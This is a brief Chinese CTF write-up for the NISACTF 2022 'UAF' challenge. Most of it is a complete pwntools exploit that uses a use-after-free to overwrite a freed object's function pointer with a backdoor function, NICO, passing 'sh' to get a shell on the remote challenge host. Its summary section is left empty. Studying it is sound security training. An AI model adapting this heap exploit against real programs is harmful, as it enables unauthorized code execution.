Problem: [NISACTF 2022]UAF
思路
sh\x00\x00对齐 然后NICO是后门函数
EXP
from pwn import *
context.log_level = 'debug'
io = remote("node4.anna.nssctf.cn",28208)
#io = process("./pwn")
e = ELF('./pwn')
libc = ELF('/home/rick/glibc-all-in-one/libs/2.31-0ubuntu9.17_amd64/libc-2.31.so')
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
def new():
sla(b":",str(1))
def edit(idx,content):
sla(b":",str(2))
sl(str(idx))
sla(b"Input your strings",content)
def show(idx):
sla(b":",str(4))
sl(str(idx))
def free(idx):
sla(b":",str(3))
sl(str(idx))
new()
free(0)
new()
edit(1,(b'sh\x00\x00'+p32(e.sym["NICO"])))
show(0)
#attach(io)
io.interactive()总结
- 对该题的考点总结